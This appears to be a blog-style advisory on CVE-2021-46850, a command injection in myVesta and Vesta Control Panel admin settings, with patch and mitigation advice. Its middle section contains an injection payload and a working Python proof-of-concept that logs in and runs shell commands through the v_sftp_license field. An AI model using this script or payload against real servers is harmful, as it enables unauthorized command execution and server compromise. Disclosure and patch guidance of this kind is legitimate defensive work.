CVE-2021-46850 - How Command Injection Threatens myVesta & Vesta Control Panel – Exploit and Details

CVE-2021-46850 is a serious vulnerability found in the myVesta Control Panel (before version .9.8-26-43) and Vesta Control Panel (before version .9.8-26). This issue allows remote, authenticated admin users to run almost any Linux command on a server through a simple HTTP request. In this post, we’ll break down how the exploit works, show a simple proof-of-concept (PoC), provide links to original sources, and help you stay protected.

What’s the Problem?

Both control panels, widely used to manage web servers, failed to sanitize input in the v_sftp_license parameter when users POST to the /edit/server endpoint. This means that an admin user—once logged in—can sneak in malicious commands, and the server will naïvely run them as the web server user (often admin or even root!).

Digging Into the Exploit

Both myVesta and Vesta CP use PHP to handle backend logic. The developer missed appropriate sanitization on the v_sftp_license variable. Let’s walk through a simplified attack:

Step 1. Log in as an admin

The attacker needs an admin account. (That’s why you should never share or reuse admin credentials!)

Step 2. Craft a Poisoned POST Request

The attacker sends a POST request to /edit/server with a deliberately malicious value for v_sftp_license, where command separators are used to inject arbitrary shell commands.

Example

If I want to run id (show the user running the web server), I set v_sftp_license to something like:

; id;

The web server executes this as a shell command—right after whatever it usually does!

Here’s a simple Python script using requests to exploit the vulnerability

import requests

# Change these according to your setup
HOST = 'https://your-vesta-server.com';
USERNAME = 'admin'
PASSWORD = 'admin123'

# Start session and authenticate
session = requests.Session()

# Log into Vesta CP (simulate login form post)
login_data = {
    'user': USERNAME,
    'password': PASSWORD,
    'login': ''  # Vesta might require extra POST fields
}
r = session.post(f'{HOST}/login/', data=login_data)

# Malicious payload: run 'id' and save to /tmp/pwned.txt
payload = '; id > /tmp/pwned.txt;'

# Send attack request
exploit_data = {
    'v_sftp_license': payload,
    # include other necessary POST fields, if required
}
exploit_url = f'{HOST}/edit/server'
response = session.post(exploit_url, data=exploit_data)

if response.ok:
    print('Exploit sent! Check /tmp/pwned.txt on server.')
else:
    print('Exploit failed. Status:', response.status_code)

After running this, any command in payload will execute on the server—confirm by opening /tmp/pwned.txt.

Attacker must be logged in as admin.

Compromise another account first, or abuse reused/weak passwords.

How Can You Protect Yourself?

1. Update your Vesta/myVesta Control Panel!
  - myVesta: https://github.com/myvesta/vesta/releases
  - Vesta: https://github.com/serghey-rodin/vesta/releases

Only let trusted IPs access the control panel.

3. Monitor logs for suspicious POSTs to /edit/server.

Change default passwords and review all user accounts.

References and Further Reading

- NVD – CVE-2021-46850
- Original myVesta Security Advisory
- Exploit Database (EDB-ID: 51036)

Conclusion

CVE-2021-46850 is a classic but dangerous example of command injection in modern server control panels. If you use myVesta or Vesta Control Panel, upgrade _immediately_ and make sure your admin areas are tightly secured. This exploit, while requiring admin access, can turn one small mistake into a full server breach.

Stay patched, and always sanitize your inputs!

_Disclaimer: This post is for educational purposes only. Do not test on servers you do not own or have explicit authorization to audit._

Timeline

Published on: 10/24/2022 14:15:00 UTC
Last modified on: 10/25/2022 14:43:00 UTC